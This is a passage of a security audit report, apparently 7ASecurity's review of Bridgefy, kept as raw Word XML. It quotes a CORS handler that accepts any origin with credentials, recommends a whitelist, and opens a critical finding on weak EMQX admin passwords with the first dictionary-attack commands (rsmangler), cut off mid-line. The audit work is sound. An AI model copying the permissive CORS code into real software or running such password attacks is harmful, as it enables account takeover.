          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CorsConfig </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1115" w:right="4802" w:hanging="198"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>initCors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RequestHandler[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>const </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>corsOptions = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1511" w:right="4309" w:hanging="198"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(origin,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>callback)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>callback(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[cors({ credentials: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, ...corsOptions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>})];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement a whitelist approach where a single allowed domain is sent in HTTP responses (i.e. instead of rendering the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>incoming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>origin).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Alternatively,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the origin header could be checked to be a trusted Bridgefy subdomain. In the latter case, the response only renders the user-supplied domain as allowed for CORS when it appears in the whitelist of origins. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cross Origin Resource Sharing </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>section of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP HTML5 Security Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487589888">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>205820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="15" name="Graphic 15"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="15" name="Graphic 15"/>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6.206348pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15726592;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape8" coordorigin="1440,324" coordsize="2880,0" path="m1440,324l4320,324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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/>
          <w:w w:val="150"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#cross-origin...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250050" w:id="5"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP3/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>EMQX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="980000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy partially fixed this issue and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is valid. Implementation of the remaining hardening guidance is ongoing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy Dashboard application uses the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Firebase REST API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> to create new user accounts. It was found that the current implementation fails to validate password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>strength during the signup and password change processes. For example, weak combinations like “same password as login” or 123456 are allowed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>noted that the EMQX Dashboard implements a worse password policy, where even 123 gets accepted as a password on the login page. Malicious attackers may leverage these weaknesses to take over Firebase user accounts, as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>well</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>EMQX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>accounts,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>by trying to login with the same password as the email address or using automated tools with weak password lists. Please note EMQX administrator access could be gained during this engagement through this weakness. Additionally, during the documentation review, no process was found to enforce password policies via test scripts on a regular basis. This issue was confirmed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EMQX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following example illustrates possible steps to perform an automated dictionary attack, which results in admin access to the EMQX Dashboard:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo bridgefy &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>seeds.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="4309" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ruby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rsmangler.rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
